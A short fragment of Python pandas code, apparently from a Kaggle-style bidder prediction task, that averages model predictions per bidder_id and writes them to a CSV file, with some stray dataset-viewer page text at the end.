df.columns = chunks[0].columns
c.append(df)
df = pd.concat(c)
df.index = te.bidder_id
df = df.groupby(level=0).mean()
df.columns = ['prediction'
|
]
df.to_csv('data/facebook.te.20150509_1.csv', index_label='bidder_id')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.